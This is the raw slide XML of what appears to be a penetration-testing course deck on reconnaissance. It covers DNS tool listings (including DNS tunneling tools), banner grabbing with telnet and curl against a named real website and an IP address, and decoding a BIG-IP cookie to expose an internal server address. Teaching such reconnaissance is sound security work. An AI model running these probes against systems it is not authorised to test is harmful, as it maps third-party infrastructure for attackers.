              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B852835-8287-3A4B-9534-E151DAB0B3C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># man host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># man dig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># apropos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>delv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (1)             - DNS lookup and validation utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dig (1)              - DNS lookup utility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dns2tcpc (1)         - A tunneling tool that encapsulate TCP traffic over DNS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dns2tcpd (1)         - A tunneling tool that encapsulate TCP traffic over DNS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnsdomainname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (1)    - show the system's DNS domain name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnsmasq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (8)          - A lightweight DHCP and caching DNS server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnsrecon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (1)         - DNS Enumeration and Scanning Tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3648088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894C-2215-C94E-8DCF-D956BDF2C588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Banner Grabbing – Telnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B82BAF0-5561-8040-9FFD-EB736999DE31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr numCol="2">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># telnet 162.241.50.205 21</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trying 162.241.50.205...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connected to 162.241.50.205.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escape character is '^]'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>220----- Welcome to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pure-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FTPd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] [TLS] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>220-You are user number 1 of 50 allowed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># telnet 162.241.50.205 3306</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trying 162.241.50.205...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connected to 162.241.50.205.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escape character is '^]'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>J</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.7.26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>aDw0?Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_native_passwordConnection closed by foreign host.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2848636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051D9-5907-B04A-9F1E-64124605A8C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Telnet – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebPages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17B0CF11-7C8A-BE43-A480-7E94BF14ADD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1333499"/>
            <a:ext cx="7924800" cy="4152635"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># telnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trying 45.60.132.186...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connected to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escape character is '^]'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEAD / HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP/1.0 302 Moved Temporarily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Location: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BigIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection: Keep-Alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Length: 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set-Cookie: visid_incap_144072=6SzXEklgTDGgG4ZEg0P8sU7Ht10AAAAAQUIPAAAAAACLnLu4Ux/dvasgj+Ji8tot; expires=Tue, 27 Oct 2020 08:11:14 GMT; path=/; Domain=.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2272170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A4E1-060C-DF46-8AAE-C3C02A9440B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Banner Grabbing - Curl</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02F98A59-784D-C74D-803A-4EFD7EB63276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># curl -I https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP/1.1 301 Moved Permanently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Date: Mon, 28 Oct 2019 02:39:11 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache/2.4.6 (Red Hat Enterprise Linux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Location: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.americanbar.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cache-Control: max-age=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expires: Mon, 28 Oct 2019 02:39:12 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Type: text/html; charset=iso-8859-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set-Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BIGipServerAEMweb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1526966464.20480.0000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; path=/; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Httponly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2255585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3506-A4E5-5048-8688-54B4CC5E7AC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BIGIP – Information Disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A0DAFF-4DCB-1948-B74A-B37B5F3F5088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://support.f5.com/csp/article/K6917</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># git clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/psmet/BIGip-cookie-decoder.git</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BIGip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-cookie-decoder/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BIGIP_decode_cookie.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BIGipServerAEMweb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=1526966464.20480.0000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Cookie to decode: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BIGipServerAEMweb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=1526966464.20480.0000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Pool name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AEMweb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[*] Decoded IP and Port: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.3.91:80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2537353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22D9-5D42-C34D-8DCB-0E916E6EAD3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful Curl Arguments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4A1F41-C82C-3C4D-939E-7D8E84258323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr numCol="2"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--http0.9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--http1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
